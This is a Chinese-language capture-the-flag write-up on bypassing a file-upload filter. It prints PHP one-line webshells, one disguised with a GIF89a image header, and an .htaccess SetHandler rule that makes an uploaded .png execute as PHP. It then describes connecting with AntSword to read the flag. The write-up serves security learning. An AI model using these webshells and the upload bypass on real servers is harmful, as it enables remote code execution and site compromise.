赞
踩
一,制作一句话木马
嵌入php脚本的html中,phtml后缀文件。
GIF89a? <script language="php">eval($_POST['pass']);</script>
完全是由php写的一句话木马,php后缀文件
<?php@eval(_POST[‘pass’]);?>
二,上传文件
发现不能绕过检测,更改后缀为png,上传成功
打开蚁剑测试链连接,返回数据为空
网上查询资料发现这是属于文件解析漏洞,就是更改apache里.htaccess配置.可以将其它类型的文件转化为PHP的文件类型。
三,现在开始编辑一个.htacces文件
<FilesMatch "1.png"> SetHandler application/x-httpd-php </FilesMatch>
(注;文件名1.png须和上传的一句话木马文件相同名称。)
上传.htaccess
现在就可直接进行蚁剑连接了
根目录下找到flag
总结;
1,一句话木马php后缀文件,phtml后缀文件,web服务器都会用php解释器解析
区别;
当不能使用php代码直接注入时可以改为phtml格式加入GIF89a(图片头文件欺骗),后台认为是图片,上传后再执行木马
2,.htaccess
.htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
本题中就是利用.htaccess更改文件扩展名的方式来将1.png变为1.php文件,使其运行来让我们获得webshell,进而获得flag
3.php对上传文件的检测
赞
踩
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。